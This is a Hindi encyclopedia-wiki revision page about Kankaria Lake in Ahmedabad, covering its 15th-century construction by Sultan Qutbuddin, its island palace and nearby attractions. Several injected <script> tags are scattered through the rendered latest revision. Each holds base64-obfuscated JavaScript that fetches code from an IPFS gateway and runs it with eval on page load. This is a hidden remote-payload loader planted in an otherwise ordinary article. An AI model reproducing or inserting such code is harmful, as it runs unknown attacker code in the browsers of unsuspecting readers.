Difference between revisions of "काँकरिया झील"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('{{पुनरीक्षण}} '''कंकारी झील''' भारत के गुजरात राज्य के ...' के साथ नया पन्ना बनाया)
 
 
(10 intermediate revisions by 5 users not shown)
Line 1: Line 1:
{{पुनरीक्षण}}
+
{{सूचना बक्सा झील
'''कंकारी झील''' [[भारत]] के [[गुजरात]] राज्य के [[अहमदाबाद]] शहर में स्थित सबसे बड़ी झील है।
+
|चित्र=Kankaria-Lake.jpg
*कंकारी झील को क़ुतुबु हौज और हौज-ए-क़ुतुबु के नाम से भी जाना जाता था।
+
|चित्र का नाम=काँकरिया झील, अहमदाबाद
*क़ुतुबुद्दीन ने कंकारी झील का निर्माण 15वीं शताब्दी में सुरु किया और 1451 ईसवी में स्थापित हुई।  
+
|नाम= काँकरिया झील
*कंकारी झील पर्यटकों के बीच में बहुत प्रसिद्ध है।
+
|प्रकार=
*कंकारी झील के चारों ओर बहुत ही ख़ूबसूरत बगीचा है।  
+
|देश=[[भारत]]
*कंकारी झील के मध्य में बहुत ही सुंदर द्वीप महल है। यहाँ [[मुग़ल काल]] के दौरान [[नूरजहाँ]] और [[जहांगीर]] अक्सर घूमने जाया करते थे।
+
|राज्य=[[गुजरात]]
 +
|नगर=[[अहमदाबाद]]
 +
|निर्देशांक=[http://maps.google.com/maps?q=23.006,72.6011&t=m&z=12&vpsrc=0 उत्तर- 23.006°  पूर्व- 72.6011°]
 +
|अधिकतम लंबाई=
 +
|अधिकतम गहराई=
 +
|अधिकतम चौड़ाई=
 +
|सतह की ऊँचाई=
 +
|जल क्षमता=
 +
|जल का ठहराव समय=
 +
|गूगल मानचित्र=[http://maps.google.co.in/maps?q=kankaria+lake&hl=en&ll=23.00612,72.59182&spn=0.07379,0.110378&client=firefox-a&hnear=Kankaria+Lake&t=m&z=13&vpsrc=6 गूगल मानचित्र]
 +
|शीर्षक 1=निर्माता
 +
|पाठ 1=सुल्तान क़ुतुबुद्दीन
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी=काँकरिया झील को क़ुतुबु हौज़ और हौज-ए-क़ुतुबु के नाम से भी जाना जाता था।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन={{अद्यतन|12:16, 24 जनवरी 2012 (IST)}}
 +
}}
 +
'''काँकरिया झील''' [[भारत]] के [[गुजरात]] राज्य के [[अहमदाबाद]] शहर में स्थित सबसे बड़ी झील है।
 +
*काँकरिया झील को 'क़ुतुबु हौज' और 'हौज-ए-क़ुतुबु' के नाम से भी जाना जाता था।
 +
*सुल्तान क़ुतुबुद्दीन ने काँकरिया झील का निर्माण 15वीं शताब्दी में शुरू किया और 1451 ईस्वी में स्थापित हुई।  
 +
*लगभग डेढ़ कि.मी. परिधि में फैली इस झील के मध्य नगीनावाड़ी महल स्थित है।
 +
*काँकरिया झील के मध्य में बहुत ही सुंदर द्वीप महल है। यहाँ [[मुग़ल काल]] के दौरान [[नूरजहाँ]] और [[जहांगीर]] अक्सर घूमने जाया करते थे।
 +
*काँकरिया झील पर्यटकों के बीच में बहुत प्रसिद्ध है और यहाँ नौका विहार का भी उत्तम प्रबंध है।
 +
*काँकरिया झील के चारों ओर बहुत ही ख़ूबसूरत बगीचे है और इसी झील के निकट बाल वाटिका, चिड़ियाघर आदि स्थित हैं।
 +
*शाही बाग़ महल, शाह आलम का रोज़ा, केलिको टेक्सटाईल संग्रहालय, श्रेयांस लोक-कला संग्रहालय आदि शहर के अन्य प्रमुख पर्यटन आकर्षण है।
  
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 +
==विथिका==
 +
<center>
 +
काँकरिया झील
 +
<gallery>
 +
चित्र:Kankaria Lake-3.jpg
 +
चित्र:Kankaria Lake-4.jpg
 +
चित्र:Kankaria Lake-5.jpg
 +
चित्र:Kankaria Lake-6.jpg
 +
</gallery>
 +
</center>
 +
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
Line 18: Line 54:
 
[[Category:भारत की झीलें]]
 
[[Category:भारत की झीलें]]
 
[[Category:गुजरात के पर्यटन स्थल]]
 
[[Category:गुजरात के पर्यटन स्थल]]
[[Category:नभूगोल कोश]]
+
[[Category:भूगोल कोश]]
  
 
__INDEX__
 
__INDEX__

Latest revision as of 10:05, 7 September 2016

kaankariya jhil
nam kaankariya jhil
desh bharat
rajy gujarat
nagar/zila ahamadabad
nirdeshaank uttar- 23.006° poorv- 72.6011°
googal manachitr googal manachitr
nirmata sultan qutubuddin
any janakari kaankariya jhil ko qutubu hauz aur hauj-e-qutubu ke nam se bhi jana jata tha.
adyatan‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> kaankariya jhil bharat ke gujarat rajy ke ahamadabad shahar mean sthit sabase b di jhil hai.

  • kaankariya jhil ko 'qutubu hauj' aur 'hauj-e-qutubu' ke nam se bhi jana jata tha.
  • sultan qutubuddin ne kaankariya jhil ka nirman 15vian shatabdi mean shuroo kiya aur 1451 eesvi mean sthapit huee.
  • lagabhag dedh ki.mi. paridhi mean phaili is jhil ke madhy naginava di mahal sthit hai.
  • kaankariya jhil ke madhy mean bahut hi suandar dvip mahal hai. yahaan mugal kal ke dauran noorajahaan aur jahaangir aksar ghoomane jaya karate the.
  • kaankariya jhil paryatakoan ke bich mean bahut prasiddh hai aur yahaan nauka vihar ka bhi uttam prabandh hai.
  • kaankariya jhil ke charoan or bahut hi khoobasoorat bagiche hai aur isi jhil ke nikat bal vatika, chi diyaghar adi sthit haian.
  • shahi bag mahal, shah alam ka roza, keliko teksataeel sangrahalay, shreyaans lok-kala sangrahalay adi shahar ke any pramukh paryatan akarshan hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

vithika

kaankariya jhil

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>